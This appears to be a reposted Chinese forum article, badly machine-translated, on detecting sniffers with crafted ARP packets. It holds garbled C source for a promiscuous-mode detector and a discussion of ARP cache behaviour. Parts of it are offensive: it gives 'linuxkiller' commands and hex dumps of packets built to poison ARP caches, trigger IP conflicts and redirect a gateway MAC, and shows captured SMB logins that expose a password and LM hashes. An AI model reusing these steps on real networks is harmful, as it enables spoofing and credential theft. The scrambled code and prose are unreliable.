2. Tech
  3. How to detect SNIFFER

How to detect SNIFFER

zhaozj2021-02-16  72

How to detect Sniffer Technology Details L0PHT has explained, as follows: Win9X / NT is normal, that is .ff.ff is considered to be a broadcast address. In the chaotic mode, the NIC test is not a broadcast address only to receive the first eight-bit group value of the Package Ethernet address, and 0xff is considered to be a broadcast address. With this minimal difference, Sniffer can be detected before, and some versions have this problem: when mixed mode, each package is transmitted to the operating system kernel to handle. In handling some packages, just look at the IP address without watching the source physical address in the Ethernet head. So: Use a non-existent destination MAC, the correct purpose IP, the affected kernel will handle it due to a mixed mode, and pay it to the corresponding system stack processing. Thus, the detection Sniffer is in short, as long as the destination address in an Ethernet head is the ARP package of FF.00.00.00.00.00 (L0PHT company is ff.ff.ff.ff.ff.ff.00), Linux and Windows NIC can detect A computer in a chaotic state. The following is a program for detecting the Snifer under Linux. Many places have passed, which can also detect the Windows machine.

:) / * gcc -lbsd -o3 -o linuxanti linuxanti.c * / / * network promiscuous Ethernet detector. Linux 2.0.x / 2.1.x, libc5 & glibc -------------- --------------------------- (c) 1998 savage@apostols.org -------------- -------------------------- SCAN Your Subnet, And Detect Promiscuous Windows & Linuxes. It Really Works, Not a Joke. ---- ------------------------------------- $ ID: NEPED.C, V 1.4 1998/07 / 20 22:31:52 Savage Exp $ * / #include #include / * for nonblocking * / #include #include / * Basic Socket Definitions * / #include / * for ifReq * / #include / * inet (3) functions * / #define eth_p_arp 0x0806 #define max_pack_len 2000 #define Ether_Header_len 14 #define ARPREQUEST 1 #define ARPREPLY 2 #define perr (s) fprintf (stderr, s) struct arp_struct {u_char dst_mac [6]; u_char src_mac [6]; u_short pkt_type; u_short hw_type; u_short pro_type; u_char hw_len; u_char pro_len U_SHORT ARP_OP; U_CHAR Sender_eth [6]; u_char sender_ip [4]; u _char target_eth [6]; u_char target_ip [4];}; union {u_char full_packet [MAX_PACK_LEN]; struct arp_struct arp_pkt;} a; #define full_packet a.full_packet #define arp_pkt a.arp_pkt char * inetaddr (u_int32_t ip) {struct IN_ADDR IN; IN.S_ADDR = IP; return inet_ntoa (in);} char * hwaddr (u_char * s) {static char buf [30]; sprintf (buf, "% 02x:% 02x:% 02x:% 02x:% 02x:% 02x ", S [0], S [1], S [2], S [3], S [4], S [5]); RETURN BUF;} void main (int Argc, char ** Argv) {int REC; INT LEN, FROM_LEN, RSFLAGS; struct ifreq if_data; struct sockaddr from; u_int8_t mymac [6]; u_int32_t myip, mynetmask, mybroadcast, ip, dip, sip; if (GetUid ()! = 0) { Perr ("

You Must Be root to run this program! / N "); exit (0);} if (argc! = 2) {fprintf (stderr," usage:% s eth0 / n ", argv [0]); exit 0);}} f ((AF_INET, SOCK_PACKET, HTONS (Eth_P_ARP))) <0) {Perror ("Socket"); exit (0); }printf ("--------- ------------------------------------- / n "); struct (if_data.ifr_name, argv [1]); IF (IOCTL (REC, SiocGiFhwaddr, & IF_DATA) <0) {Perr (" Can't Get HW Addres of My Interface! / n "); EXIT ( 1);} Memcpy (MyMac, IF_DATA.IFR_HWADDR.SA_DATA, 6); Printf ("> My HW addr:% s / n", hwaddr (mymac)); IF (IOCTL (REC, Siocgifaddr, & if_data) <0) {Perr ("can't get ip addres of my interface! / n"); exit (1);} Memcpy (void *) & ip, (void *) & if_data.ifr_addr.sa_data 2, 4); myip = NTOHL (IP); Printf ("> My IP ADDR:% S / N", INETADDR (IP)); IF (IOCTL (REC, SiocgifNetmask, & IF_DATA) <0) Perr ("Can't get Netmask AddRes of My Interface ! / n "); Memcpy (Void *) & IP, (void *) & if_data.ifr_netmask.sa_data 2, 4); MyNetmask = NTOHL (IP); Printf ("> My Netmask:% S / N ", in ETADDR (IP)); if (IOCTL (REC, Siocgifbrdaddr, & if_data) <0) Perr ("Can't get Broadcast AddRes of My Interface! / n"); Memcpy ((void *) & IP, (void *) & if_data .IFR_Broadddr.sa_data 2, 4); MyBroadcast = NTOHL (IP); Printf ("> my Broadcast:% S / N", INETADDR (IP)); if ((rsflags = fcntl (REC, F_GETFL)) == -1) {PERROR ("FCNTL F_GETFL"); exit (1);} if (Fcntl (REC, F_SETFL, RSFLAGS | O_NONBLOCK) == -1) {PERROR ("Fcntl f_setfl"; exit (1);} Printf ("

-------------------------------------------------- ------- / n "); Printf ("> scanning .... / n "); for (DIP = (MyIP & MyNetmask) 1; Dip = 0) && (DIP - NTOHL (SIP) <= 2)) {Printf ("*> host% s,% s **** promiscuous mode detected !!! / n", inetaddr (sip), hwaddr (ARP_PKT . Ssender_eth);}}} printf ("> end./N"); exit (0);} Sniffer Scner ace studio, 1999. (ACESTUDIO@hotmail.com) Running Environment: Win95 / 98, no Winsock this program can The computer that is running Sniffer is being running in this network or the network card is in the confusion. The other party's operating system can be Win95 / 98 / NT, Linux.

Sniffer usually only monitors the computer (which mainly looks at the topology of the network) on the same hub (this mainly seeing the topology of the network), but it is detected that Sniffer can limit, as long as the communication can be used with the other party. As long as you meet the Snifer in other networks, you can also be found. It is generally not necessary to automatically detect network configurations. Once the scan finds that someone is eavesdressing, the other party's IP, MAC will be recorded in the Antilog.txt. Note: Sometimes misunderstand. Generally, some network card driver itself can be downloaded at http://202.115.16.8/~skyfly/Net/anti.zip http://www2.neiep.edu.cn/ace/net/anti.zip http://www2.neiep.edu.cn/ace/net/anti.zip When the host enters the LAN, send a free ARP notification message to the entire subnet, which is the use of broadcast way request to parse your IP address, but the source and target IP are already in place. Free ARP (Source IP and Target IP Consonsions) Requests that a package affects the entire subnet, if a wrong free ARP request appears, the entire subnet is disarmed. Even if the host does not send a free ARP packet, it will also cause its IP-MAC to enter the ARP Cache on the LAN on the ARP Cache, so the conflict is not necessarily related to the free ARP package because the subsequent Request requests have entered the ARP Cache to enter the LAN. This conclusion can be understood this way, a Linux host and PWIN98 compete for IP address, the Linux host will compete for success, but PWIN98 has been reporting IP conflicts, obviously followed by all IP conflict reports are not related to the free ARP package. The in_ARPINPUT () function is a classic implementation in 4.XBSD-Lite2 1. If the request is reached for a request for a IP address of the unit, the response is sent. The ARP entry is established (if the corresponding entry does not exist). This optimization avoids excessive ARP packet exchange. 2. If the ARP responded, the corresponding ARP portal established completed, the MAC address of the heterogeneous host is stored in the SockAddr_dl structure, the goal in the queue is that the packet of the heterogeneous host can now be sent. 3. If the heterogeneous host sends an ARP request package or response package, the source IP address in the package is equal to its own IP address, then there will be an error configured with an IP address. Net / 3 detects this error and reports to the administrator. 4. The host receives the ARP package from the heterogeneous host, which already exists. If the MAC address of the abovers in the package has changed, the MAC address in the corresponding ARP entry is updated. 5. The host can be configured as Proxy ARP Server. This means it replaces the ARP request in place of the target host. The PROXY ARP is discussed in Section I. Use the ARP command to configure a host to become Proxy ARP Server. From 3 to see when conflict monitoring, from 4 to see when ARP Cache is dynamically modified.

./linuxkiller -o 0x80000200 -c 0x0806 -b140002 -q eth0 capture a complete binary display of an ARP Reply message BYTEARRAY [60 bytes] ----> 00000000 00 00 21 CE 28 A4 00 00 00 00 00 00 00 00 00 0022 F1 08 06 00 01 ..! ??.! ?? ... 00000010 08 00 06 04 00 02 00 00-21 D1 22 F1 C0 A8 43 6F ........! Ulcer "enclosure Co 00000020 00 00 21 CE 28 A4 C0 A8-43 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20-20 20 20 [ARP / RARP] Hardware = 0001 Protocol = 0800 Hardaddlen = 06 Proaddlen = 04 00: 00: 21: D1: 22: F1 -> 00: 00: 21: CE: 28: A4 192.168.67.111 -> 192.168.67.11 -> 192.168.67.11-> 192.168.67.11-> 192.168.67.11-> 192.168.67.11-> 192.168.67.11-> 192.168.67.11 -> 08 06 00 01 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0018-43 74 This packet causes 192.168.67.111 Mac in Arp Cache of 192.168.67.116. Yes 00-00-00-00-00-00-00 52: 54: AB: 13: E1: C8 00 00 00 00 00 00 06 00 01 08 00 06 04 00 02 FF-FF-FF-EE-EE- EE C0 A8 43 6C 00 00 00 00 00 C0 A8-43 7C This packet caused 192.168.67.108 Mac in Arp Cache in 192.168.67.124 to occur in FF-FF-FF-EE-EE-EE 00 00 21 CE 28 a4 00 00 00 00 00 08 06 00 01 08 00 00 00 00 00 00 c 0 A8 43 6F 00 00 00 00 00 00 00 00 00 00 This can not be, because 192.168.67.116 was written 0.0.0.0 00 00 00 11 11 11 00 00-00 00 00 00 08 06 00 01 08 00 06 04 00 02 00-00-22-F1-21-D1 C0 A8-43 6A This result in the report of ARP conflicts on 192.168.67.106, the MAC address that causes conflict is 00-00-22-F1-21-D1 00-00- 21-D1-22-F1 00 00 00 00 00 08 06 00 01 08 00 06 04 00 02 00-00-22-F1-21-D1 C0 A8 43 65 This result in the report of ARP conflicts on 192.168.67.101 The above packet cat> Linuxkiller.byteArray, then execute ./linuxkiller -k Linuxkiller.ByteArray -w 5 will result in the five conflict packages, will immediately see the effect. If it is under Windows, it is also possible to send it with NetXray, but NetXRay has a problem, not to send messages to a certain size, and cannot send any bytes, so you may need to fill part of the data. The ARP packet has no conceptual concept, so you don't have to consider the problem of recalculating the checksum. There is no meaning in the conflict, and it is a bit used by the ARP Cache, which is part of the ARP SPOOF. Free ARP is required for mobile IP.

The Linux solution is always respecting the ATF_PERM flag, that is, the static ARP entry does not change the ARP package that is received under the ARP performance optimization rules. PWIN98 The static ARP entry established with arp -s will be transmitted dynamically changed by the ARP package, at least I test to send an ARP request package to the whole subnet broadcast, trying to modify the MAC address of the gateway IP as the wrong Mac, success. Because the ARP broadcast package is not affected by LAN Switch or Smart Hub, this is a very helpless conclusion. Struct mysmbhdr {u_char SMB_C [4]; / ​​* 0xff SMB, must be the four bytes * / u_char SMB_Command; / * currently only process 0x25 * / u_char SMB_ERRORCLASS; / * 0 Success, when these four bytes Sometimes continued to handle * u_char SMB_RESERVED0; / * 0x00 * / u_short SMB_ERRORCODE; / * 00 00 SUCCESS * / U_CHAR SMB_FLAGS1; / * 0x80 Server Response, only processing this situation * / u_short SMB_FLAGS2; / * host byte order, don't理 理 * / u_char SMB_PAD0 [12]; / * All 0 Fill bytes * / U_Short SMB_TREEID; / * Host Byte Sequence * / U_Short SMB_CallerPid; / * Host Byte Sequence * / U_Short SMB_UNAUTHUID; / * Host Byte Sequence * / u_short smb_multiplexid; / * host byte order * / u_char smb_countofparam; / * start from smb_sentparambytes how many u_sh ort # ignore * / u_short smb_sentparambytes; / * host byte order * / u_short smb_totalsentdata; / * host byte order * / u_char smb_countofparam; / * start from smb_sentparambytes how many u_sh ort u_short smb_sentparambytes;? / * host byte order * / u_short smb_totalsentdata; / * host byte order * / u_short smb_reserved1; / * 00 00 * / u_short smb_paramcount ; / * Host byte order * / u_short smb_paramoffset; / * host byte order, use this offset to deterally share resources? * / U_short smb_paramdisplace; / * host byte * / u_short smb_datacount; / * host byte Order * / u_s HORT SMB_DATAOFFSET; / * Host byte order, start processing from this offset * / u_short smb_datadisplacement; / * Host byte order * /}; password expressive time ./linuxkiller -v 000021411 -a 110000 -b 2575006500680B32 -F 2200 From 192.168.67.106 to 192.168.67.107 One-way Mac filtration, analysis SMB packets, enter the TCP data area offset 25h? Byte filtering UEH2 [TCPSMB] 192.168.67.106 [1190] -> 192.168.67.107 [139] byteaRray [143 bytes] ---->

00000000 00 00 00 8B FF 53 4D 42-73 00 00 00 00 10 00 00 ... Xian Bs ....... 00000010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 CD 16 .. ..........? 00000020 01 00 82 A6 0D 75 00 65-00 68 0B 32 00 00 8A .. 偊. 偊H2 ... 00000030 14 00 00 01 00 01 00 00 00 00 01 00 00 28 ............. (00000040 00 00 00 53 43 5A 00 56-45 4E 55 53 54 45 43 48 ... scz.venustec H 00000050 00 57 69 6E 64 6F 77 73-20 34 2E 30 00 57 69 6e .windows 4.0.wi n 00000060 64 6F 77 73 20 34 2E 30-00 04 ff 00 00 00 02 00 DOWS 4.0 ... 00000070 09 00 1B 00 xx xx xx xx-xx xx xx xx 00 5c 5c 56 .... xxxxxxx.// v 00000080 45 4E 55 53 5C 53 43 5A-00 3F 3F 3F 3F 00 Enus / scz.??? ??. Password encryption transmission ./linuxkiller -u 000000111111 -a 110000 -B 2575006500680B32 -F 200 [TCPSMB] 192.168.67.106 [1136] -> 192.168.67.107 [139] byteArray [158 BYTES] ----> 00000000 00 00 00 9A FF 53 4D 42-73 00 00 00 00 10 00 00 ... discontented Bs ....... 00000010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 CD 16 ... .......... 00000020 01 00 01 4e 0d 75 00 65 -00 68 0B 32 00 00 00 C7 ... Nueh2 ... 0000000030 1F 00 00 01 00 00 00 00 00 28 ............... (00000040 00 00 00 53 43 5A 00 56-45 4E 55 53 54 45 43 48 ... scz.venustec H 00000050 00 57 69 6E 64 6F 77 73-20 34 2E 30 00 57 69 6e .windows 4.0.wi n 00000060 64 6F 77 73 20 34 2E 30-00 04 ff 00 00 00 02 00 DOWS 4.0 ... 00000070 18 00 2A 00 E4 7F 2C 5D-88 04 86 D5 2A 96 73 3C... *.,] ? 喺 * 杝 <00000080 4e 95 67 40 B8 38 F5 CB-6C 11 6D 1C 5C 5C 56 45 N is @

? Lame lm // VE 00000090 4E 55 53 5C 53 43 5A 00-3F 3F 3F 3F 3F 00 NUS / SCZ. ?????. 53435a00 SCZ 56454e55535445434800 VENUSTECH 57696e646f777320342e3000 Windows 4.0 57696e646f777320342e3000 Windows 4.0 04ff000000020018002a00 e47f2c5d880486d52a96733c4e956740b838f5cb6c116d1c 5c5c56454e55535c53435a00 // VENUS / SCZ 3f3f3f3f3f00 preserved with network assassin result SCZ / VENUSTECH: 3: 9f62be236e88c1be: 000053435a0056454e5553544543480057696e646f7 7732: 000000000000000000000000000000000000000000000000 Almost brothers to the program, many of them are removed header file, this discussion does not make sense to go and what I do not say, anyway, the following The header file will be used by yourself. Note that some headers are in order, I can use it, if you increase or decrease, don't move the order already given.

LINUX compiles the socket program is not like Solaris, which is -lsl -lsocket, which can be directly GCC. #include / * for isalpha * / #include #include #include #include / * ANSI C Header file * / #include / * for syslog () * / #include #include / * for nonplocking * / #include #include / * for getpass * / #include / * for pthread_ * / #include #include #include / * time.pec {} for pselect () * / #include #include / * for mmap * / #include < Sys / poll.h> / * for point * / #include / * Basic socket definitions * / #include / * for s_xxx file mode constants * / #include / * timevalval {} for select () * / #include / * Basic system data type * / #include / * for ipic {} and readv / Writev * / #include / * for unix domain sockets * / #include #include / * for share memory * / #include #include / * for Page_size * / #include / * for ifreq * / #include #include / * sockaddr_in {} AND Other Internet Defns * / #include / * for iphdr * / #include / * for icmphdr * / #include / * for igmp * / #include / * for tcphdr * / #include / * for udphdr * / #include / * for arphdr * / #include / * inet (3) functions * / #include

/ * for Ethhdr #define Eth_P_all 0x0003 * / #include / * for struct sockaddr_ll * / #include #include #include / * for sysctl * / First, thank you very much for the introduction of Skyfly, answering me a long-awaited problem. The last time I was compiled back from Tsinghua Linux Source Code. She was called the MAC address in the following statement. I used to reach the detection effect as long as Fake Mac. I didn't expect to have other trips. Now use this statement, you can simultaneously for Windows and Linux Memcpy (ARP_PKT.DST_MAC, "/ XFF / 0/0/0/0/0", 6); / * ff: 00: 00: 00: 00 : 00 * / Estimated source code is also writing errors, should not be / 255/255/255/255/255/0, in which case only the mixed mode network card under Linux, instead of detecting NetXray existence . Because the send is ad: ad: ad: ad: ad: 0, this Fake Mac still discovered the existence of SOCK_PACKET, but did not find the existence of NetXray. And FF: 00: 00: 00: 00: 00 discovering the existence of NetXray and IPMAN, the latter also means that all VPacket.vxd will be discovered, including network assassins and S-Term. However, PRED also pointed out that the monitoring of the PROMISC mode for the NIC is based on the different reactions of the operating system, and when the monitoring can not be discharged, this can't check the PROMISC mode network card. Although I didn't listen without any agreement, the problem poised in PRED should exist. It is recommended that all protocols that can be connected to the PWIN98 that can be normally entered the LAN, reinstall NetXRay or directly use IPMAN to listen, know how the effect is. Especially the hardware devices specifically used to analyze the local area network analysis, the program is estimated that this program does not monitor their existence. If you come back, there are several people who will listen in the case of this unit, so it is still very practical. Just start NetXray, the network card enters the mixed mode. This can report the network conflict package from it even without listening, the same BOY series tool, LinkViewPro, etc., as long as the start is started, even without listening It will also set up a network card to a mixed mode and cancel the mixed mode after exiting. But those tools using VPacke T.VX are not, network assassins, if you don't choose to monitor, the NIC is still in normal mode. I don't know how to use the monitoring tools under NT using packet.sys look, I haven't tested it. Under Linux, if you are root users, after Ifconfig eth0 promisc, running Antisniff, discovery is also monitored, you can make people play, let him come to you, then start sophistication. Although using the antisniff of L0PHT, I have been strange why I don't have the source code from Tsinghua. I can explain it. Today, I explained Skyfly, I understand, I thank Skyfly again.

转载请注明原文地址:https://www.9cbs.com/read-14715.html

9cbs

New Post(0)